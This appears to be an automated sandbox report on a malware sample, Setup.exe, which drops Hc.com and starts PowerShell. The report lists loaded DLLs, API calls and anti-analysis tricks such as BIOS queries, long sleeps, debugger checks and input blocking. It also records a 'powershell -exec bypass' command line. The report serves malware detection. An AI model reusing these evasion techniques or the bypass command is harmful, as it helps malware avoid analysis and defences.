            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winrnr.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: webio.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Setup.exe Static file information: File size 73409696 > 1048576
            Source: Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2341213621.0000000007879000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
            Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 11_2_002B0315 push cs; retn 002Ah 11_2_002B0318
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 11_2_00280DE6 push ecx; ret 11_2_00280DF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_04F70C6D push ebx; iretd 16_2_04F70C7A

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\280366\Hc.com

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 11_2_002F26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_002F26DD
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Code function: 11_2_0027FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_0027FC7C
            Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    System information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 8124
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 1590
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 2160
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 1101
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    API coverage: 4.0 %
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com TID: 8168    Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448    Thread sleep count: 8124 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448    Thread sleep count: 1590 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484    Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128    Thread sleep count: 2160 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3512    Thread sleep count: 1101 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3492    Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exe    Last function: Thread delayed
            Source: C:\Users\user\Desktop\Setup.exe    Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\Setup.exe    Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CDC54
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA087
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA1E2
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_002CE472
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_002DA570
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_0029C622 FindFirstFileExW,11_2_0029C622
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002D66DC FindFirstFileW,FindNextFileW,FindClose,11_2_002D66DC
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002D7333 FindFirstFileW,FindClose,11_2_002D7333
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002D73D4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CD921
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_00265FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00265FC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exe    File opened: C:\Users\user\AppData\Local\Temp\280366
            Source: C:\Windows\SysWOW64\cmd.exe    File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe    File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe    File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe    File opened: C:\Users\user\AppData\Local\Temp\280366\
            Source: C:\Windows\SysWOW64\cmd.exe    File opened: C:\Users\user\
            Source: Hc.com, 0000000B.00000002.2324271859.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: Hyper-V RAW8
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000010.00000002.2334301446.0000000005126000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002DF4FF BlockInput,11_2_002DF4FF
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_0026338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_0026338B
            Source: C:\Users\user\Desktop\Setup.exe    Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_00285058 mov eax, dword ptr fs:[00000030h] 11_2_00285058
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002C20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_002C20AA
            Source: C:\Windows\SysWOW64\tasklist.exe    Process token adjusted: Debug
